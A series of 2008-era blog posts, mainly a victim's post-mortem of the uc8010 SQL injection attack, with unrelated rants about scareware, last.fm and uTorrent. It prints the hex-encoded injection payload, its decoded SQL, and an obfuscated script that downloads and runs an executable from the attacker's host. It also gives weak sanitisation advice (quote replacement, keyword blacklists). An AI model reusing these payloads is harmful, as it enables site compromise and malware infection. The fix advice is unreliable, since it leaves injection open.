Microsoft issues advice on SQL injection attacks

Microsoft is alerting customers to several tools that could bolster Web application development in the wake of a rising number of SQL injection attacks targeting faulty code in websites.

This includes that uc8010 attack which was launched around 28 December 2007. (see here and here for the lowdown on uc8010.

For the record, the attack is about poor programming (or lazy programming at any rate), and Microsoft are keen to point out that:

Is this a security vulnerability that requires Microsoft to issue a security update?
No. Any Web application code that has followed generally accepted best practices for security is significantly less susceptible to the SQL injection attack. Although this is not a security vulnerability, this advisory was issued to provide additional warning and assistance for administrators with vulnerable sites.

Microsoft Security Advisory (954462) Rise in SQL Injection Attacks Exploiting Unverified User Data Input

For those of you who have been recently hit by an SQL injection attack here are some useful resources that I have found:

What do to do if you do not have a backed up copy of your database before the SQL injection attack

hackademix.net has code which *may* reverse the SQL injection attack

This is the crucial piece of code which could save your bacon:

EXEC(
     '
    
update ['+@T+'] set ['+@C+'] = left(
       convert(varchar(8000), ['+@C+']),
       len(convert(varchar(8000), ['+@C+'])) - 6 -
       patindex(''%tpircs<%'',
       reverse(convert(varchar(8000), ['+@C+']))))
     where ['+@C+'] like ''%<script%</script>''
   
'
);
more than likely you will have to modify it for your specific attack. Please check the hackademix.net for full details.

Advertisements

Cannot login to last.fm

Am I the only person in the world that cannot login to last.fm?

I know my username and password are okay, because under some circumstances I authenticate ok. Their forums don’t mention it.  So is it just me? If you have the same problem, please let me know.

(When I enter my login name and password and hit “come on in”, I get dumped to https://www.last.fm/login)

Phah maybe it will be okay tomorrow. I’m using Firefox 3.0.1. They upgraded the site recently, but I can’t believe they broke the login??

uc8010 sql injection attack: the facts, more info and post mortem

I posted this when my website got hacked. Within hours thanks to several clever guys,  the whole thing was completely deconstructed with hard facts and code. Thanks to all those that contributed their information, it really helped me and many others out there.

This post is a summary of the comments spawned by my original post. If I forgot something important let me know.

Also check out:

How it was done

SQL injection through via unescaped querystring variables.

We think they looked and tried several query string variables (like id, by, filter, etc)

Here is the code they injected (gotten from someone’s logfiles, and slightly tidied)

2007-12-30 18:22:46 POST /crappyoutsourcedCMS.asp;
DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST
(0×4400450043004C0041005200450020004000540020007
600610072006300680061007200280032003500350029002
C00400043002000760061007200630068006100720028003
20035003500290020004400450043004C004100520045002
0005400610062006C0065005F0043007500720073006F007
200200043005500520053004F005200200046004F0052002
000730065006C00650063007400200061002E006E0061006
D0065002C0062002E006E0061006D0065002000660072006
F006D0020007300790073006F0062006A006500630074007
300200061002C0073007900730063006F006C0075006D006
E00730020006200200077006800650072006500200061002
E00690064003D0062002E0069006400200061006E0064002
00061002E00780074007900700065003D002700750027002
00061006E0064002000280062002E0078007400790070006
5003D003900390020006F007200200062002E00780074007
900700065003D003300350020006F007200200062002E007
80074007900700065003D0032003300310020006F0072002
00062002E00780074007900700065003D003100360037002
90020004F00500045004E0020005400610062006C0065005
F0043007500720073006F007200200046004500540043004
80020004E004500580054002000460052004F004D0020002
0005400610062006C0065005F0043007500720073006F007
200200049004E0054004F002000400054002C00400043002
0005700480049004C0045002800400040004600450054004
30048005F005300540041005400550053003D00300029002
00042004500470049004E002000650078006500630028002
70075007000640061007400650020005B0027002B0040005
4002B0027005D00200073006500740020005B0027002B004
00043002B0027005D003D0072007400720069006D0028006
3006F006E007600650072007400280076006100720063006
800610072002C005B0027002B00400043002B0027005D002
90029002B00270027003C007300630072006900700074002
0007300720063003D0068007400740070003A002F002F006
3002E007500630038003000310030002E0063006F006D002
F0030002E006A0073003E003C002F0073006300720069007
00074003E002700270027002900460045005400430048002
0004E004500580054002000460052004F004D00200020005
400610062006C0065005F0043007500720073006F0072002
00049004E0054004F002000400054002C004000430020004
5004E004400200043004C004F00530045002000540061006
2006C0065005F0043007500720073006F007200200044004
50041004C004C004F0043004100540045002000540061006
2006C0065005F0043007500720073006F007200%20AS%20
NVARCHAR(4000));
EXEC(@S);–178|80040e14|Unclosed_quotation_mark_before_the_character_string_’G;
DECLARE_@S_NVARCHAR4000);
SET_@S=CAST0x4400450043004C004100520045002000400
054002000760061007200630068006100720028003200350
0350029002C00400043002000'.
202.101.162.73 HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library) - 500 15248

The actual SQL injected looks like this (decoded this looks like

DECLARE @T varchar(255),@C varchar(255)DECLARE Table_Cursor
CURSOR FOR select a.name,b.name from
 sysobjects a,
 syscolumns b
 where
 a.id=b.id
 and a.xtype='u'
 and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
 FETCH NEXT FROM Table_Cursor INTO @T,@C
  WHILE(@@FETCH_STATUS=0)
  BEGIN
  exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
  END
  CLOSE Table_Cursor
DEALLOCATE Table_Cursor

How to find it exactly how it happened to you

Try this in the command prompt on your logfiles:
find "0x4400450043" ex071228.log
find "0x4400450043" ex071229.log
find "0x4400450043" ex071230.log

How to fix

Make sure you escape your variables to protect against SQL injection.

In this case (MS SQL Server), you should do (something like) this:

string safer_id = Request.QueryString["id"].Replace("'","''");

By the looks of it ‘CAST(‘ and ‘EXEC(‘ look like good things to disallow too. More than likely you should restrict the length of the querystrings too, so something like the below can’t really hurt.

string safer = Request.QueryString["id"].Replace("'","''");
if (safer .Length > 128) safer = safer.Substring(0,127);
safer = safer.Replace("CAST(","NOCAST](");
safer = safer.Replace("'EXEC(","NOEXEC](");

These are not fool proof(*) and you should use STORED PROCEDURES in future (I know it is much more work!).

What did it do?

Basically the code injected into your database found every varchar and text field and appended the string:

<script src=http://?.uc8010.com/0.js></script>

The code for 0.js looks like:

function setCookie(name,value)
{
var Days = 1;var exp = new Date();
exp.setTime(exp.getTime() + Days*30*60*1000);
//Days*24*60*60*1000;
document.cookie = name + "="+ escape(value) +";expires="+ exp.toGMTString();
}
function getCookie(name)
{
var arr = document.cookie.match(new RegExp("(^| )"+name+"=([^;]*)(;|$)"));
if(arr != null)
{
return unescape(arr[2]);
}
else
{
document.writeln("");
document.writeln("");
setCookie("Lin","ok");
return null;
}
}
getCookie("Lin")eval("\146\165\156\143\164\151\157\156\40\147\156\50\162\122\141\107\105\171\153\125\61\51\15\12\173\15\12\166\141\162\40\117\162\150\62\75\167\151\156\144\157\167\133\42\115\141\164\150\42\135\133\42\162\141\156\144\157\155\42\135\50\51\52\162\122\141\107\105\171\153\125\61\73\15\12\162\145\164\165\162\156\47\176\164\155\160\47\53\47\56\164\155\160\47\15\12\175\15\12\146\165\156\143\164\151\157\156\40\104\157\167\156\105\50\106\151\154\145\125\122\114\54\114\157\143\141\154\106\151\154\145\51\15\12\173\15\12\164\162\171\15\12\173\15\12\166\151\160\75\106\151\154\145\125\122\114\73\15\12\166\141\162\40\143\150\145\156\172\151\75\167\151\156\144\157\167\133\42\144\157\143\165\155\145\156\164\42\135\133\42\143\162\145\141\164\145\105\154\145\155\145\156\164\42\135\50\42\157\142\152\145\143\164\42\51\73\15\12\143\150\145\156\172\151\133\42\163\145\164\101\164\164\162\151\142\165\164\145\42\135\50\42\143\154\141\163\163\151\144\42\54\42\143\154\163\151\144\72\102\104\71\66\103\65\65\66\55\66\65\101\63\55\61\61\104\60\55\71\70\63\101\55\60\60\103\60\64\106\103\62\71\105\63\66\42\51\73\15\12\166\141\162\40\160\163\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\115\151\143\162\157\163\157\146\164\56\130\115\114\110\124\124\120\42\54\42\42\51\73\15\12\166\141\162\40\154\157\166\145\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\101\144\157\144\142\56\123\164\162\145\141\155\42\54\42\42\51\73\15\12\154\157\166\145\133\42\164\171\160\145\42\135\75\61\73\15\12\160\163\133\42\157\160\145\156\42\135\50\42\107\105\124\42\54\166\151\160\54\60\51\73\15\12\160\163\133\42\163\145\156\144\42\135\50\51\73\15\12\143\150\151\156\141\75\147\156\50\61\60\60\60\60\51\53\114\157\143\141\154\106\151\154\145\73\15\12\166\141\162\40\150\110\146\44\122\66\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\123\143\162\151\160\164\151\156\147\56\106\151\154\145\123\171\163\164\145\155\117\142\152\145\143\164\42\54\42\42\51\73\15\12\166\141\162\40\126\147\104\156\132\130\110\164\67\75\150\110\146\44\122\66\133\42\107\145\164\123\160\145\143\151\141\154\106\157\154\144\145\162\42\135\50\60\51\73\15\12\143\150\151\156\141\75\150\110\146\44\122\66\133\42\102\165\151\154\144\120\141\164\150\42\135\50\126\147\104\156\132\130\110\164\67\54\143\150\151\156\141\51\73\15\12\154\157\166\145\133\42\117\160\145\156\42\135\50\51\73\15\12\154\157\166\145\133\42\127\162\151\164\145\42\135\50\160\163\133\42\162\145\163\160\157\156\163\145\102\157\144\171\42\135\51\73\15\12\154\157\166\145\133\42\123\141\166\145\124\157\106\151\154\145\42\135\50\143\150\151\156\141\54\62\51\73\15\12\154\157\166\145\133\42\103\154\157\163\145\42\135\50\51\73\15\12\166\141\162\40\123\155\101\143\161\111\167\107\126\70\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\123\150\145\154\154\56\101\160\160\154\151\143\141\164\151\157\156\42\54\42\42\51\73\15\12\145\170\160\61\75\150\110\146\44\122\66\133\42\102\165\151\154\144\120\141\164\150\42\135\50\126\147\104\156\132\130\110\164\67\53\47\134\134\163\171\163\164\145\155\63\62\47\54\47\143\155\144\56\145\170\145\47\51\73\15\12\123\155\101\143\161\111\167\107\126\70\133\42\123\150\145\154\154\105\170\145\143\165\164\145\42\135\50\145\170\160\61\54\47\40\57\143\40\47\53\143\150\151\156\141\54\42\42\54\42\157\160\145\156\42\54\60\51\175\143\141\164\143\150\50\151\51\173\151\75\61\175\15\12\175\15\12\104\157\167\156\105\50\42\150\164\164\160\72\57\57\143\56\165\143\70\60\61\60\56\143\157\155\57\162\156\155\142\57\60\57\61\56\145\170\145\42\54\42\61\71\56\145\170\145\42\51\73")

It is malicious: the point

According to websmithrob this code is malicious and hidden in there is an attack known as the EXPL_REALPLAY.H
or RealPlayer Exploit (read more about it here)

Microsoft issue security advisory

uc8010 is an SQL injection attack

02 January 2008
original post: a plea for help

I cannot find any information about this anywhere, but it happened to me and at least 76,800 others. Information is thin on the ground. If you know more please post it here.

As far as I can tell, the attack inserts <script src=http://?.uc8010.com/0.js></script> into all varchar and text fields in your SQL database.

For lazy people like me, it is proving to be a nightmare! I have traditionally been very relaxed about this kind of business, I guess I must be more careful from now on.

07 January 2008
update on uc8010(dot)com

The exploit has been exposed and described (see the comments below; very, very informative, or go straight to the post-mortem). Below you can find out HOW they did it and WHAT it did. There is no magic fix, you will most likely have to restore your data from a backup, and to prevent further attacks you should escape all querystring variables coming into your database.
Thanks very much to the guys who posted their findings here! Much appreciated.

The attack *is* malicious, and the potential payload is described here http://websmithrob.wordpress.com/ (or this http://isc.sans.org/diary.html?date=2008-01-04).

Also watch out for ucmal.com (122.224.146.246) which appears to be up to similiar tricks.

When is a trojan not a trojan: asecurityservice.com

A non-technical friend of mine recently phoned me up to say he had been infected by a virus.  His home page was hi-jacked and he was pretty worried. The infection was proudly proclaimed to be by asecurityservice.com.  According to several sources [of dubious accuracy]  this is very serious.

asecurityservice.com is dangerous toolbar and comes from very dangerous trojan zlob. It hijack your homepage and displays fake warning message to download the another fake spyware applications… If your computer is infected by asecurityservice.com.com hijacker then it is very dangerous for your computer.

from http://www.pcontech.com/

Note how many times they say dangerous. Note how poor the English is. Note how childishly they warn you of the impending doom. Ooooh this must be bad. I want my {mommy | blanket | cigarettes | pillow} (delete as appropriate)

What are the symptoms?

User’s homepage is changed to asecurityservice.com.com or to other unfamiliar websites. Warning messages such as “Virus Alert”, “Your Computer is Infected”, “Security Alert” Trojan-Spy.win32@mx or Spyware.Cyberlog-X infections are displayed.

You even get a warning that something has happened.

The art of deception: dead?

Well that’s all very interesting, but if I were seriously writing a trojan, would I shout so loudly that I had invaded your machine? (I saw Troy, and I don’t remember the Spartans (holding megaphones) riding the wooden horse into Troy , shouting YOUR DEFENSES HAVE BEEN BREACHED). In fact why bother with the wooden horse in the first place?Morons.

No. More likely this is what I think should be called “asshole-ware”. Why would someone announce that you were ill, could it be so that they could sell you medicine?

Your machine probably is infected, it may even be a real trojan, but the real catch, is they get you to pay $25 to remove the infection. Its a real real dumb idea, but it probably works.

A real trojan is about stealth, it doesn’t announce that it is dangerous.

It’s extremely funny, because they warn you of:

Very High Risk   –  Extremely dangerous Spyware. asecurityservice.com Uses stealth installation, randomly named entries and has the capability to self update or Restore after incomplete removal. Very hard to remove manually. Removing by free software or Re-Name the Dll file of asecurityservice.com cannot decrease the Privacy Risk, because it uses stealth installation method

I like anything which uses stealth and then warns me that it is using steatlth. Is the art of deception truly dead? Was the Cold War all for nothing? Fuckwits.

We have a cure

You can use http://www.lavasoftusa.com to clean your machine. Its free. Its safe. Its well-known. This is a reputable product, and you can download it from http://www.downloads.com. A safe place to get stuff like this.

If you gonna lie, make it big

Lies:

The key to note is that the answer is always the same, and specific recommendation the some no-brand spyware tool. Surprising that they never suggest McAfee or Symantec etc.

Appendix of delusion

This site is probably linked to the idiot mastermind idiot of this scam: http://www.pcontech.com/ where they list their other scams.

 Latest Hijackers List  More lies:

  • besecuredtoday.com
  • Asecurityservice.com
  • asafecenter.com
  • awebsecurity.com
  • thesafetynotes.com
  • asecureinfo.com
  • topiesecurity.com
  • asafebrowser.com
  • iesafetylist.com
  • protectstand.com

Old Hijackers List Older lies:

  • assuredguard.com
  • securityiepage.com
  • secureuptodate.com
  • asecurityupdate.com
  • asafehomepage.com
  • aprotectservice.com
  • asafetywarning.com
  • asecurityview.com
  • protectpage.com
  • asafetylist.com
  • asafetyproject.com
  • asafetynotice.com
  • asecuritypaper.com

utorrent 1.7.x banned or broken

I dunno what happened, but it seems to me that uTorrent 1.7.x is broken and is being banned by several trackers. There are several VERY long threads at http://forum.torrent.com/.

Even the wiki http://en.wikipedia.org/wiki/%CE%9CTorrent has an entry under the headline Major Bugs. For posterity it currently reads (I suspect this will get removed from the post very soon).

Major bugs
On July 21, 2007 µTorrent version 1.7.2 was released which fixed two bugs that had caused earlier 1.7 versions to be banned on a variety of trackers. The bugs in question could cause wrong stats to be reported both intentionally and unintentional. The first bug was solved in version 1.7.1 and the second in 1.7.2[16]. Although rumors spread that these µTorrent versions also reported personal info to a unknown destination (possibly the RIAA or MPAA) this has not been proven.

The solution is pretty obvious: http://download.utorrent.com/1.6.1/utorrent.exe

There is a bigger issue here, and it concerns the survival of P2P, will our own paranoia about the MPAA / RIAA  force P2P out of use. Are they spreading the rumors, if they are it is certainly the best weapon they have against P2P. If its just paranoia, well that’s pretty sad. uTorrent, is one of the finest pieces of freeware ever, as essential as WinZip ever was. So let’s not ruin a good thing.

Why nothing you do will ever make a difference

Who was the Time “Person of the Year” in 2006? You’ll never believe it, no, you wouldn’t believe it if I told you, it was you (this is for real, not a “joke”).

How quaint? “You control the Information Age. Welcome to your world.” Who the fuck writes shit like this. Who the fuck believes it. Many do. Writing about holidays in the sun and polka dot bikinis.

No one cares about what you have to say.

You must have realised, after writing over 4,458 posts, and amassing 350 comments and 580,876 views, and 7.5 million page impressions, after building your pathetic “brand online“, you are #1 with a bullet in Technorati, you earn £0.53 a day from Google Adwords. What a success story you are.

You have a Page Rank of 4!

Well done, but guess what. Nothing you do ONLINE will ever make a difference. Turn it off, if you want to be noticed, go have a crap in the middle of the street, that works (you’ld be about £0.53p a day worse off though).